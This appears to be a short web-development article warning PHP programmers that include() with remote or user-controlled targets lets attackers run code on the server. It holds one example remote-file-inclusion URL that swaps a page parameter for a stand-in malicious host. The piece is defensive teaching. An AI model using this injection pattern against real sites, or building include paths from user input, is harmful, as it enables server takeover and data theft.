The include() command is powerful PHP Code to grab remote content and literally “include” it in your PHP Programs. The command is designed to make a remote or local network request to retrieve content that is inserted into your own PHP Code. There are special caveats as related to Network Security when using this command. You can compromise your web page, website, databases, or your entire web server.
Network Security is a major issue often overlooked by web designers, database developers, and even PHP programmers. Especially if you have a database with critical information, you must adhere to the rules of Network Security to protect yourself, your server, and your clients.
Since the include() command literally inserts remote code into your own, and is subsequently processed by the web server and PHP Parser, you must trust your remote code very well. The naive expectation is that the remote code will be simple HTML or even just text. One would assume that including a remote PHP script would result in the retrieval of processed PHP Code that is actually plain HTML. The problem is that a remote HTML, TEXT, or PHP page can generate content that your own PHP Script includes as Executable PHP Code.
If your PHP Code includes executable PHP Code, it will be processed by your own web server’s PHP Parser, and that spells trouble. If the included PHP Code is a Trojan Horse, or similarly damaging script, your web server will become compromised. If the included PHP Code contains scripts to read/write files, it might explore your web server for whatever is available, perhaps sending it out to the hacker or other external locations. The included PHP Code might be a mailer script that starts a spam campaign, using your web server as the source and getting you blacklisted.
Included PHP Code is capable of rewriting all of your web pages, one-by-one, to include some other form of malicious code. The included PHP Code might write some lines of code to the top or bottom of every web page that will be processed every time the page is viewed by a user. Whether the cod affects the user or your server, it’s likely going to be bad.
The include() command can be used effectively and safely, provided you are aware of the many Network Security issues it can create and you take precautions. DO NOT TRUST everyone, and beware of all external sources. Don’t think you have all the bases covered until you understand Network Security well enough to make that decision.
CAVEATS: Define your include parameters in your PHP Code and DO NOT let external sources define it for you. If you let a GET or POST variable define the include target, users can redefine the target to some malicious PHP Code. Sites that attempt to dynamically link to content by defining a GET variable (ex. http://www.domain.com/index.php?page=contact.php), can be redefined by users to include malicious PHP Code (http://www.domain.com/index.php?page=http://www.php-death.com/super-bad-code.php). Make sure you filter your include pathways and prevent illegal characters from being passed to the PHP Parser. There are almost always other PHP caveats for include() to be aware of, so don’t jump in until you know it’s safe.